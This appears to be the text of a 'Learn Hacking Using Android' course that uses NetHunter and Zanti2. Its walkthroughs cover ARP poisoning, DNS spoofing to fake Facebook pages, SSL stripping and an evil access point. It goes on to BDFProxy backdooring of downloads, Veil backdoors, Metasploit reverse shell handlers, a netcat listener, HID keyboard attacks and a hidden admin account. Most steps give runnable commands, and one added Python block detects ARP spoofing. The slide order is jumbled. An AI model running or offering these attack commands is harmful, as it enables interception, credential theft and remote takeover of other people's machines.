
Learn Hacking Using Android

BAD USB

MITM Attack

ARP Poisoning

Man In The Middle Attacks

Preparing

This is one of the most dangerous and effective attacks that can be used. It redirects packets to and from any client through our device, which makes us the "man in the middle" and means we can read, modify or drop these packets.

This is just another method of becoming the MITM (just like the bad USB attack). This attack is more effective and dangerous because it is very hard to protect against: it exploits the insecure way that ARP works, and it does not require any interaction with the target machine.

This is an implementation of the bad USB attack where the phone pretends to be a network card once plugged into a computer, forcing all traffic through the phone. Using any sniffer will then allow us to read all packets to/from the target machine.

In this section we will learn how to prepare our device for penetration testing.

1. Install device drivers on computer.

2. Unlock the device.

3. Root it; this basically installs a root user on the device. The root user has full permissions on the device, which is very important to have full control over it.

4. Install NetHunter; this is an operating system designed for penetration testing using Android devices.



How it Works

Insert HTML

Default Network

Poisoned Network

Step One

Step Two

This means the router thinks that I am the client, and the client thinks that I am the router. So my device is in the middle of the connection between the client and the router, i.e. every packet going to/from the client has to go through my device first.

Only Nexus devices and the OnePlus are officially supported at the moment, but there are unofficial releases for other devices. The installation process is the same for all officially supported devices.

Now we will send an ARP response to the router, this time telling it that "I am the client". This is done by telling the router that the device with the client IP address has MY MAC address.

We will first send an ARP response to the client telling it that "I am the router". This is done by telling the client that the device with the router IP address has MY MAC address.

ARP's main security issues:

1. Each ARP request/response is trusted.

2. Clients can accept responses even if they did not send a request.
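On the defending side, those two weaknesses are also what makes the poisoning visible: a host's ARP entry for the router IP suddenly changes to a MAC that the table already knows under another address, and the reply that caused it answered no request. The monitor below, an added example rather than code from the course, applies that check to a constructed sequence of ARP replies; the ArpEvent/ArpMonitor names, the sample MAC addresses and the `solicited` flag are assumptions of the example (a real tool would derive them from captured frames).

```python
from dataclasses import dataclass, field

@dataclass
class ArpEvent:
    ip: str          # sender protocol address in the ARP reply
    mac: str         # sender hardware address in the ARP reply
    solicited: bool  # True if this host had sent a matching ARP request

@dataclass
class ArpMonitor:
    gateway_ip: str
    table: dict = field(default_factory=dict)  # IP -> MAC learned so far
    alerts: list = field(default_factory=list)

    def observe(self, ev: ArpEvent) -> bool:
        """Check one ARP reply; return True if its mapping was accepted."""
        mac = ev.mac.lower()
        if not ev.solicited:
            # Gratuitous ARP is legitimate (DHCP, failover), so only note it.
            self.alerts.append(f"notice: unsolicited reply, {ev.ip} claims {mac}")
        known = self.table.get(ev.ip)
        if known is None:
            self.table[ev.ip] = mac
            return True
        if known == mac:
            return True
        # An IP that suddenly resolves to a different MAC is the poisoning
        # signature; the IPs that MAC already owns point at the sender.
        owner = ", ".join(ip for ip, m in self.table.items() if m == mac) or "unknown"
        sev = "critical" if ev.ip == self.gateway_ip else "warning"
        self.alerts.append(f"{sev}: {ev.ip} moved from {known} to {mac} (MAC also seen as {owner})")
        return False  # keep the first-learned mapping instead of overwriting it

def run(events, gateway_ip):
    """Feed a sequence of events through one monitor and return its alerts."""
    mon = ArpMonitor(gateway_ip)
    for ev in events:
        mon.observe(ev)
    return mon.alerts

# Constructed sample: router, client and the poisoner's own entry, then the two
# unsolicited replies the text describes, both carrying the poisoner's MAC.
SAMPLE_EVENTS = [
    ArpEvent("192.168.1.1", "AA:AA:AA:AA:AA:01", True),
    ArpEvent("192.168.1.5", "aa:aa:aa:aa:aa:05", True),
    ArpEvent("192.168.1.7", "cc:cc:cc:cc:cc:cc", True),
    ArpEvent("192.168.1.1", "cc:cc:cc:cc:cc:cc", False),  # "I am the router"
    ArpEvent("192.168.1.5", "cc:cc:cc:cc:cc:cc", False),  # "I am the client"
]
```

Calling run(SAMPLE_EVENTS, "192.168.1.1") yields a notice and a critical alert for the router entry, then a notice and a warning for the client entry, each naming 192.168.1.7 as the address the offending MAC was first learned under.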

Request

ARP Response

Reply

This enables us to run HTML code on any page visited by the target client. This means that we can use HTML code injection and XSS vulnerabilities against all websites visited by the client, which allows many attacks such as stealing cookies; but since we can poison the network, we can do these attacks in better, more reliable ways. This feature is still useful if you want to mess with the client or add certain code to ALL pages visited by the client.

1. Download the flushiptables.sh file to /sdcard/files.

2. Go to Kali Launcher >> Launch Shell in Terminal

> cd /sdcard/files #change working directory to /sdcard/files

> bash flushiptables.sh #run flushiptables.sh

> bash startbadusb-kitkat.sh #for kitkat

> bash startbadusb-lollipop.sh #for lollipop

Now all the requests/responses sent to/from the target machine will flow through our device. This makes us the Man In The Middle (MITM, hence the attack name), which means we can read and modify all data sent to/from the target device!

Sniffing Usernames

and Passwords

ARP Spoof

Arpspoof is a tool that is part of a suite called dsniff, which contains a number of network penetration tools. Arpspoof can be used to poison the network and redirect traffic to flow through our device.

1. Tell the target client that I am the router.

> arpspoof -i [interface] -t [Target IP] [AP IP]

> arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1 #Example

2. Tell the AP that I am the target client.

> arpspoof -i [interface] -t [AP IP] [Target IP]

> arpspoof -i wlan0 -t 192.168.1.1 192.168.1.5

3. Enable IP forwarding to allow packets to flow through our device without being dropped.

> echo 1 > /proc/sys/net/ipv4/ip_forward

Capture/Replace Images

When we launch a MITM attack, all packets will flow through our device, so we can read all the info sent to/from the target client including URLs, usernames and passwords. We will use Zanti2 to poison the network and read this info.

By tapping on "Logged Images" you will see all the images loaded to the target client, you can also replace all of these images by another one using the "Replace Images" feature.

Sniffing Data

DNS Spoofing

Bypassing HTTPS/SSL

DNS spoofing allows us to redirect any request for a domain to another domain; for example, we can redirect any request to facebook.com to a fake Facebook page!

We will use a tool called dnsspoof to do this.

1. Create a dnsspoof config file.

2. Run dnsspoof.

> dnsspoof -i rndis0 -f /path/to/config/file

Now that all the data is flowing through our device, all we have to do is store it in a file and read it later!

We will use a tool called tshark to do this.

> tshark -i rndis0 -w capture-file.log

#This will store captured data in capture-file.log

Now we can open this file using any packet analyzer; I prefer Wireshark.

Capture/Intercept Downloads

DNS Spoofing

Websites like Facebook, Yahoo, etc. use HTTPS on their login page. This means that these pages are validated using an SSL certificate and will therefore show a warning to the user that the certificate is invalid if there is a MITM. To bypass this, all you have to do is enable the "SSLstrip" feature in Zanti2; this will redirect all HTTPS requests to HTTP, so the client will not see a warning.

Bypassing HTTPS

We can also capture files downloaded by the target client, and not only that, we can replace them with another file; so when they download a PDF, for example, we can replace it with a malicious one that runs a backdoor or a keylogger on the target machine! Files are stored in

sdcard/ZANTI2_CAPTURES

DNS spoofing allows us to redirect any request for a certain domain to another domain; for example, we can redirect any request to facebook.com to a fake Facebook page!

Zanti2 only allows us to redirect ALL requests to a certain domain, therefore I recommend using dnsspoof the same way we used it with the badUSB attack.

Websites like Hotmail, Yahoo, etc. use HTTPS on their login page. This means that these pages are validated using an SSL certificate and will therefore show a warning to the user that the certificate is invalid if there is a MITM. To bypass this we will use a tool called sslstrip, which downgrades HTTPS connections to HTTP.

> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

> sslstrip -p



Spying

Evil Access Point

Weaponizing

Introduction

NetHunter Home

This is the main menu of NetHunter. This menu gives us access to all of the features of NetHunter; it also gives access to the main, or most powerful, attacks that can be launched using NetHunter.

In this section we will learn how to create an access point, so that others can connect to it to access the internet.

This is no ordinary access point, because we will automatically be the man in the middle: all data will be sent to us because we are the server. This means that we will be able to capture all credentials entered by clients, modify packets, etc.

We will explain all of these tools and attacks in detail in the coming lectures.

MANA-Toolkit

We simply do this by creating a hotspot and then sniffing/modifying data the same way we did with the badUSB attack.

MANA-toolkit, however, makes the whole process much simpler: it automatically creates a new AP and starts sslstrip/firelamb, and even attempts to bypass HSTS, which is used by Gmail and Facebook.

Another cool feature in MANA is that it allows us to tether the connection from one wireless card to another instead of limiting us to using 3G.

  • Weaponizing
  • Information Gathering
  • Spying
  • Exploitation

MANA has 3 main start scripts:

1. start-noupstream: starts an AP with NO internet connection.

2. start-nat-simple: starts a regular AP using the internet connection on the upstream interface.

3. start-nat-full: starts an AP with an internet connection; it also starts sslstrip, sslsplit and firelamb, and attempts to bypass HSTS.

To start a script run:

> bash /usr/share/mana-toolkit/run-mana/script-name.sh

The captured traffic will be in /var/lib/mana-toolkit.

Network Mapping

  • Discover all devices connected to the network.
  • Determine the operating system of each device.
  • Determine the open ports and services running on these ports.

Network Discovery (War Driving)

Here we will learn how to discover all Wi-Fi networks within our range and display useful information about them, like:

  • ESSID or network name.
  • Network MAC address.
  • Network channel.
  • Encryption type.
  • Speed.
  • Signal strength.

BDF Proxy

We will use an app called Wifi Analyzer, which does all of the above and also features a signal strength meter that can be used to find spots with the strongest signal.

Cracking Wi-Fi Keys

NetHunter comes with the aircrack-ng suite and reaver pre-installed; these two are all you need to crack Wi-Fi keys, whether it's WEP, WPA or WPA2.

The Backdoor Factory Proxy is a proxy that will patch binaries with a backdoor during download, so any binary downloaded by the target client will be converted to a backdoor while maintaining the binary's functionality.

BDFProxy can be used with a fake access point, or with a normal access point if we can MITM it.

To do this you need a powerful wireless card that supports monitor mode and packet injection; an example of such a card is the Alfa awus36.

These external wireless cards connect through USB, so you will need an OTG Y cable to use them.

The process of cracking these keys is the same whether it's done from a PC or from an Android device because the programs used are the same, therefore to avoid going off topic I will not explain how to crack Wi-Fi keys, however I have a full course explaining multiple attacks against each encryption, so if you are interested in taking it just message me and I will give it to you for $10 only.

Course Link:

https://www.udemy.com/learn-cracking-wi-fi-passwordskeys-wepwpawpa2/

1. Configure shellcode settings.

Advanced Scan

Basic Scan

By tapping on any discovered device, we can run a number of advanced scans that display more information about the device.

Note: HOST is the IP of the device that the client will connect to (i.e. the one that will be listening for connections).

Zanti2

> nano /etc/bdfproxy/bdfproxy.cfg

Zanti2 is a free mobile penetration testing framework that allows us to perform a number of penetration testing tasks.

In this lesson we will see how to use it to map the network our device is connected to, showing the connected devices and some basic info about them such as their operating system, IP address, MAC address and open ports.

1. Ping scan/Quick scan/OS detection/Regular scan: will not display more than the basic info you get with the basic scan that Zanti performs.

2. Intense scan: slower than 1; more detailed info about the open ports.

3. Slow comprehensive scan: very slow; will display more info about the target, including filtered ports.

These are just sample scans, you can experiment with the scan options and see the difference between them.

2. Start BDFProxy.

> bdfproxy

> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

3. ARP poison the target (no need to do this with MANA).

4. Start Metasploit to listen for connections.

> /etc/init.d/postgresql start

> /etc/init.d/metasploit start

> msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc

Fake Download Attack

Here we will use the same download interception attack we explained in the spying section so that when the target client attempts to download a program it gets replaced with a backdoor.

1. Create a backdoor.

Detecting Undetectable Backdoors

Exploitation

apt-get install veil-evasion #to install veil-evasion

veil-evasion

use 8

set LHOST [YOUR IP]

generate

Information Gathering

2. Listen for connections

Spider Foot

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_http

set LHOST [YOUR IP]

set LPORT [PORT]

  • Check properties of the file.
  • Is it what it seems to be?
  • Run the file in a virtual machine and check resources.
  • Use an online Sandbox service.

> https://www.hybrid-analysis.com/

SpiderFoot is an open source footprinting tool. It is designed to make the process of information gathering easier; it allows us to gather a lot of information about a domain and creates a nice report at the end with all the gathered info.

3. Run Zanti >> select target client >> MITM >> Intercept Downloads. Select exe for the file type and choose the backdoor we created in step 1.

> kalimenu

>> information gathering >> spiderFoot

Then navigate to 127.0.0.1:5001.

Note: the fake file does not have to be a backdoor; it can be any file such as a keylogger/virus, etc.

Now choose a scan name, enter the target domain, select the data that you want to collect (you can group them by module) and tap "Run Scan".

Once finished, tap on the "Browse" tab to see the final report or download it.

HID Attack

HID Ducky Scripts

This attack allows us to execute any command or gain FULL access to any Windows computer connected to our Android device.

This menu allows us to write our own HID keyboard attacks.

We first need to write it as a Rubber Ducky script, and then it can convert it to HID attack format for us.

I am a keyboard

How it works

Alternatively you can use any existing Rubber Ducky script, or use the payload generator to make one.

PS: links for the payload generator and Rubber Ducky script writing are in the resources menu on the right.

Once connected, the Android device will trick the computer by pretending to be a keyboard; it will then send a number of commands very quickly to the computer. These commands can be used to run any DOS command or gain full access to the machine using the PowerSploit option.

This attack will work even if the autorun feature is disabled, as the commands are sent as normal keystrokes.

There are two variations of this attack:

Linux Shell

Download & Execute

We can use the exact same script that we used with OSX to get a shell on any Linux device; the only thing that we need to change is how to launch the terminal, which in Ubuntu distros for example is Alt+F2.

Here we will use a simple script that will download a file and execute it.

This is really useful because it means we can run ANY file we want just by connecting our Android device to a computer; this file can be a backdoor, virus, keylogger, etc.

OSX Shell

2. PowerSploit

1. Windows CMD

PS: the script is in the resources menu on the right.

This will create a server that will give us full access to the target computer.

This will allow us to run windows commands on the target machine.

Just enter the commands you want to run in the "source" box and click on "update" then "Execute".

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_https

set LHOST [YOUR IP]

set LPORT [PORT]

First of all we need to listen on a certain port for incoming connections so that the target machine can connect back to us.

This can be done from a laptop or from your android device.

The HID keyboard attacks work on ALL operating systems including OSX, so today we will use a simple script to gain full access to any OSX machine once it's connected to our Android device via USB.

This script will send a connection to a certain IP address; you need to use a tool called netcat to receive this connection. Netcat is pre-installed in NetHunter and in Kali Linux, and it can also be installed on Windows.

Run the following command to listen for incoming connections:

Ex:

This is the device that will be used to control the target machine.

net user test /add

net localgroup administrators test /add

Now you need to configure the payload on your android device, set the IP and port values as the same values that you chose in the previous step and leave the URL as it is.

This will add a user "test" and add it to the administrators group.

Now all you have to do is click on update and execute.

nc -vv -l -p [PORT]

https://www.zimperium.com/zanti-mobile-penetration-testing

Select target >> scan >> scan type

IP: Client IP

MAC: Hacker MAC

"I am the client"

ARP Response

IP: Router IP

MAC: Hacker MAC

"I am the router"

Request

Reply
